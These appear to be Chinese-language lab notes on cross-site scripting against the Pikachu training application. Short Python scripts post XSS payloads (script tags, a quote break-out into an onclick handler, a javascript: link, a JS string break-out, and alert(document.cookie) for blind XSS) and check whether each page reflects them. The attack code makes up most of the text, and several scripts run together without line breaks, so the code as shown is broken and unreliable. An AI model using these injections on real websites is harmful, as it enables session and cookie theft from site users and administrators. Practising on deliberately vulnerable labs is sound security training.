xss之盲打
#盲打的意思就是,你注入的内容,不会在前台出现,只有放管理员在后台触发时候,才会执行回显过滤
htmlspecialchars
#htmlspecialchars () 没有加 ENT_QUOTES,单引号 ' 不被转义,导致可以闭合属性、插入恶意事件。href
#href 输出:没过滤协议 → javascript: 执行代码js
#JS 输出:没转义引号 → 闭合字符串执行代码#盲打的意思就是,你注入的内容,不会在前台出现,只有放管理员在后台触发时候,才会执行回显
import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xssblind/xss_blind.php"
payload = "<script>alert(document.cookie)</script>"
resp = requests.post(url, data={"content":payload,"name":"name"})
print("[+] 注入完成! ")
print("[+] 检测是否注入成功: ",payload in resp.text)import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_01.php"
payload = "<Script>alert(1)</Script>"
resp = requests.get(url,params={"message":payload,"submit":"submit"})
print("[+] 完成注入")
print("[+] 查看是否注入成功: ",'<Script>' in resp.text)#htmlspecialchars () 没有加 ENT_QUOTES,单引号 ' 不被转义,导致可以闭合属性、插入恶意事件。
import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_02.php"
payload = "' onclick='alert(1)'"
resp = requests.get(url,params={"message":payload,"submit":"submit"})
print("[+] 注入完成")
print("[+] 查看是否注入成功: ",payload in resp.text)
print("点击一下页面,弹出弹框")#href 输出:没过滤协议 → javascript: 执行代码
import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_03.php"
payload = "javascript:alert(1);"
resp = requests.get(url, params={"message":payload,"submit":"submit"})
print("[+] 注入完成")
print("[+] 查看注入是否成功:",payload in resp.text )
print("[+] 点击页面的链接")
print(f"[+] 或者点击:{url}?message={payload}")#JS 输出:没转义引号 → 闭合字符串执行代码
import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_04.php"
payload = "';alert(1);//"
resp = requests.get(url,params={"message":payload,"submit":"submit"})
print("[+] 注入完成")
print("[+] 查看是否注入成功: ","alert" in resp.text)